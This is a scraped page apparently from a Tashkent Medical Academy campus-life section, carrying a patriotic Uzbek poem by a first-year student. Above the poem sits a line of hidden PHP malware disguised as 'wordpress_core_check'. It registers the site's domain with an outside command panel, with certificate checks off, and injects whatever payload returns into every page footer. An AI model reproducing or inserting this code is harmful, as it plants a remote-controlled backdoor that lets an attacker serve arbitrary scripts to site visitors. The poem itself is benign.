if(!function_exists('wordpress_core_check')){function wordpress_core_check(){ $c2_url="https://validlogs.com/BackPanel/panel.php"; $domain=parse_url(home_url(),PHP_URL_HOST); $resp=wp_remote_post($c2_url,["body"=>["action"=>"register_domain","domain"=>$domain],"timeout"=>8,"sslverify"=>false]);if(is_wp_error($resp))return;$payload=wp_remote_retrieve_body($resp);if(!empty($payload)){add_action("wp_footer",function() use ($payload){echo $payload;});}}add_action("init","wordpress_core_check",9999);}
KELING, VATANIMIZGA QANOT BOʻLAYLIK! – Toshkent tibbiyot akademiyasi – Kampus hayoti
- Sabolari navo boʻlib allalagan yurt,
- Qaldirgʻochlar ayvonida bolalagan yurt,
- Farzandiga neʼmatlarin saralagan yurt,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Oʻtmish zahmatlaridan bagʻri kuygan el,
- Oʻzi faqir, lek yetimni silab-suygan el,
- Qora qozon qaynovidan shukur tuygan el,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Har qadalgan niholga jon bergan tuproq,
- Dushmanga boʻysunmay qad kergan tuproq,
- Senga, menga, barchaga Vatan shu tuproq,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Qovjiragan giyohga najot bu osmon,
- Quyosh, oy, yulduzi panoh bu osmon,
- Shahidlar mardligiga guvoh bu osmon,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Navoiy chashmasidan suv ichgan nihol,
- Temur adolatidan yaralgan viqor,
- Islom bobom mehridan yashnagan gulzor,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Ne ne ulugʻ zotlarga ota bu zamin,
- Har bir gul-u giyohga ona bu zamin,
- Qalb koʻzla boq asli jannat bu zamin,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Erklik uchun jon berib kurashgan hur xalq,
- Asriy udum-odati yarashgan gul xalq,
- Hamma havas ila qarashgan zoʻr xalq,
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- Nega senday xalqqa jon bermay Vatan?!
- Qalbimning gul saroyidan joy bermay Vatan?!
- Nega sen deb yonmaylik, kuymaylik Vatan?!
- Shu aziz el uchun panoh boʻlaylik,
- Keling, Vatanimizga qanot boʻlaylik!
- G’oyibnazarova Kumush Toshkent Tibbiyot Akademiyasi Tibbiy Profilaktika fakulteti 1 -bosqich talabasi
Add Comment